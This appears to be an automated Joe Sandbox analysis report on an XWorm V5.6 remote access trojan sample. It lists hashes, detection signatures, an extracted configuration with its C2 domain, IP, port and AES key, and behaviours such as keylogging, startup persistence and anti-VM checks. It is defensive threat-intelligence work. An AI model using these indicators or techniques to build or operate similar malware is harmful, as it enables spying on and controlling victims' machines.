Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe

Overview

General Information

Sample name:17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe
Analysis ID:1546912
MD5:fb84f0c948174966776db1e4592fdc75
SHA1:178b6ce2ddd9de88d5e6b39c212254b50d45cfd7
SHA256:58e5f9caa04676b6269b870cc4aa3997287fd3a038d1df59e5bd2c41b75bbd62
Tags:base64-decodedexeuser-abuse_ch
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["browser-hazard.gl.at.ply.gg"], "Port": "2620", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeJoeSecurity_XWormYara detected XWormJoe Security
    17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x8140:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x81dd:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x82f2:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x7dee:$cnc4: POST / HTTP/1.1

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Roaming\x-manager.exeJoeSecurity_XWormYara detected XWormJoe Security
      C:\Users\user\AppData\Roaming\x-manager.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x8140:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x81dd:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x82f2:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x7dee:$cnc4: POST / HTTP/1.1

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000000.1664072674.0000000000C52000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        00000000.00000000.1664072674.0000000000C52000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x7f40:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x7fdd:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x80f2:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x7bee:$cnc4: POST / HTTP/1.1
        00000000.00000002.4108233558.0000000013048000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
          00000000.00000002.4108233558.0000000013048000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x9c00:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x9c9d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x9db2:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x98ae:$cnc4: POST / HTTP/1.1
          Process Memory Space: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe PID: 5224JoeSecurity_XWormYara detected XWormJoe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.13049ac0.1.unpackJoeSecurity_XWormYara detected XWormJoe Security
              0.2.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.13049ac0.1.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0x6340:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0x63dd:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0x64f2:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0x5fee:$cnc4: POST / HTTP/1.1
              0.2.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.13049ac0.1.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
                0.2.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.13049ac0.1.raw.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                • 0x8140:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                • 0x81dd:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                • 0x82f2:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                • 0x7dee:$cnc4: POST / HTTP/1.1
                0.0.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.c50000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                  Click to see the 1 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Startup Folder File Write
                  Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe, ProcessId: 5224, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x-manager.lnk

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-01T17:31:15.782631+010020229301A Network Trojan was detected172.202.163.200443192.168.2.449731TCP
                  2024-11-01T17:31:55.570005+010020229301A Network Trojan was detected4.245.163.56443192.168.2.449742TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-01T17:33:14.873431+010028531931Malware Command and Control Activity Detected192.168.2.450014147.185.221.232620TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeAvira: detected
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\x-manager.exeAvira: detection malicious, Label: TR/Spy.Gen
                  Found malware configuration
                  Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeMalware Configuration Extractor: Xworm {"C2 url": ["browser-hazard.gl.at.ply.gg"], "Port": "2620", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\x-manager.exeReversingLabs: Detection: 84%
                  Multi AV Scanner detection for submitted file
                  Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeReversingLabs: Detection: 84%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\x-manager.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeJoe Sandbox ML: detected
                  Sample uses string decryption to hide its real strings
                  Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeString decryptor: browser-hazard.gl.at.ply.gg
                  Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeString decryptor: 2620
                  Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeString decryptor: <123456789>
                  Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeString decryptor: <Xwormmm>
                  Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeString decryptor: XWorm V5.6
                  Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeString decryptor: USB.exe
                  Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeString decryptor: %AppData%
                  Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeString decryptor: x-manager.exe
                  Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49829 -> 147.185.221.23:2620
                  Source: Network trafficSuricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:50014 -> 147.185.221.23:2620
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: browser-hazard.gl.at.ply.gg
                  Source: global trafficTCP traffic: 192.168.2.4:49730 -> 147.185.221.23:2620
                  Source: Joe Sandbox ViewIP Address: 147.185.221.23 147.185.221.23
                  Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
                  Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49731
                  Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.4:49742
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficDNS traffic detected: DNS query: browser-hazard.gl.at.ply.gg
                  Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe, 00000000.00000002.4107271743.0000000003041000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to log keystrokes (.Net Source)
                  Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe, XLogger.cs.Net Code: KeyboardLayout
                  Source: x-manager.exe.0.dr, XLogger.cs.Net Code: KeyboardLayout
                  Source: 0.2.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.13049ac0.1.raw.unpack, XLogger.cs.Net Code: KeyboardLayout

                  Operating System Destruction

                  barindex
                  Protects its processes via BreakOnTermination flag
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess information set: 01 00 00 00 Jump to behavior

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 0.2.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.13049ac0.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 0.2.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.13049ac0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 0.0.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.c50000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 00000000.00000000.1664072674.0000000000C52000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 00000000.00000002.4108233558.0000000013048000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: C:\Users\user\AppData\Roaming\x-manager.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeCode function: 0_2_00007FFD9B8897620_2_00007FFD9B889762
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeCode function: 0_2_00007FFD9B8889B60_2_00007FFD9B8889B6
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeCode function: 0_2_00007FFD9B8805A80_2_00007FFD9B8805A8
                  Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe, 00000000.00000000.1664100465.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamexworm.exe4 vs 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe
                  Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe, 00000000.00000002.4108233558.0000000013048000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamexworm.exe4 vs 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe
                  Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeBinary or memory string: OriginalFilenamexworm.exe4 vs 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe
                  Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 0.2.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.13049ac0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 0.2.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.13049ac0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 0.0.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.c50000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 00000000.00000000.1664072674.0000000000C52000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 00000000.00000002.4108233558.0000000013048000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: C:\Users\user\AppData\Roaming\x-manager.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                  Source: x-manager.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                  Source: x-manager.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                  Source: x-manager.exe.0.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.13049ac0.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.13049ac0.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.13049ac0.1.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.13049ac0.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 0.2.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.13049ac0.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: x-manager.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: x-manager.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/3@1/1
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeFile created: C:\Users\user\AppData\Roaming\x-manager.exeJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeMutant created: NULL
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeMutant created: \Sessions\1\BaseNamedObjects\5fGznRuUj1JrT03R
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeFile created: C:\Users\user\AppData\Local\Temp\Log.tmpJump to behavior
                  Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeReversingLabs: Detection: 84%
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeFile read: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeSection loaded: cscapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeSection loaded: wbemcomn.dllJump to behavior
